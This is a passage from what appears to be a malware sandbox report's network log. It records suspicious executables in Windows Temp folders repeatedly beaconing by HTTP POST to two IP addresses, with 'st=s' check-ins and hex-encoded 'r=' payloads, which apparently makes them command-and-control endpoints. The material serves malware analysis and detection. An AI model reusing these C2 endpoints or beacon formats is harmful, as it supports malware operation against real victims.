                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:35.162914991 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      785192.168.2.550633193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:35.103662968 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:35.358568907 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      786192.168.2.550634193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:35.522598982 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:35.767996073 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      787192.168.2.550635193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:35.714906931 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:35.963450909 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      788192.168.2.550636193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:36.021290064 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:36.275113106 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      789192.168.2.550637193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:36.211263895 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:36.461401939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      790192.168.2.550638193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:36.644637108 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:36.893424034 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      791192.168.2.550639193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:36.819397926 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:37.064719915 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      792192.168.2.550640193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:37.149118900 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:37.402888060 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      793192.168.2.550641193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:37.321908951 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:37.570317984 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      794192.168.2.550642193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:37.764167070 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:38.015588045 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      795192.168.2.550643193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:37.931225061 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:38.179800987 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      796192.168.2.550644193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:38.268912077 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:38.521471024 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      797192.168.2.550645193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:38.434638023 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:38.688963890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      798192.168.2.550646193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:38.884622097 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:39.131378889 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      799192.168.2.550647193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:39.062916994 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:39.311497927 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      800192.168.2.550648193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:39.380281925 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:39.629511118 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


